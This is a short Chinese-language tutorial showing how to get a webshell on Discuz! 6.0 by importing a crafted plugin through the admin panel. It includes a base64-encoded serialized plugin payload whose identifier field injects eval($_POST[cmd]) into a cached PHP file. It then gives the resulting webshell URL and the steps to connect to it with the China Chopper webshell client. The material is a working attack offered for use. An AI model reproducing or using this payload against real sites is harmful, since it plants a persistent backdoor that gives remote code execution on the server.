| Discuz!6.0 管理员权限插件导入获取 Webshell 的原理跟 Discuz!7.2 差不 多,但其代码有些不一样,该代码是经过编码的,将该文件保存为 xml 文件。导 入代码如下: YToyOntzOjY6InBsdWdpbiI7YTo5OntzOjk6ImF2YWlsYWJsZSI7czoxOiIxIjtzOjc6I mFkbWluaWQiO3M6MToiMCI7czo0OiJuYW1lIjtzOjg6IkdldFNoZWxsIjtzOjEwOiJpZG VudGlmaWVyIjtzOjI2OiJhJ109ZXZhbCgkX1BPU1RbY21kXSk7JGFbJyI7czoxMToiZGV zY3JpcHRpb24iO3M6MDoiIjtzOjEwOiJkYXRhdGFibGVzIjtzOjA6IiI7czo5OiJkaXJl Y3RvcnkiO3M6MDoiIjtzOjk6ImNvcHlyaWdodCI7czowOiIiO3M6NzoibW9kdWxlcyI7c zowOiIiO31zOjc6InZlcnNpb24iO3M6NToiNi4wLjAiO30= 1.导入插件 进入 Discuz6.0后台后,单击“扩展设置”,然后单击“插件管理”,如图 1 所示, 将上面的代码复制到导入插件数据的文本框中,同时选择“允许导入不同版本 Discuz!的插件”。  2.查看导入到插件 导入成功后,会自动在插件管理中显示插件名称,唯一标识符等,如图 2 所示, 表示插件导入成功。  3.测试 Webshell Discuz!6.0 插件导入后获取的 Webshell 需要有执行权限,否则即使导入成 功,也可能不能获取 Webshell,其 Webshell 的具体地址为: http://localhost/dz6.0/forumdata/cache/plugin_a']=eval($_POST[cmd]); a['.php 将该地址加入到一句话后门中,如图3 所示。  在中国菜刀中单击刚才添加到记录,如图4 所示,成功获取 Webshell。  |
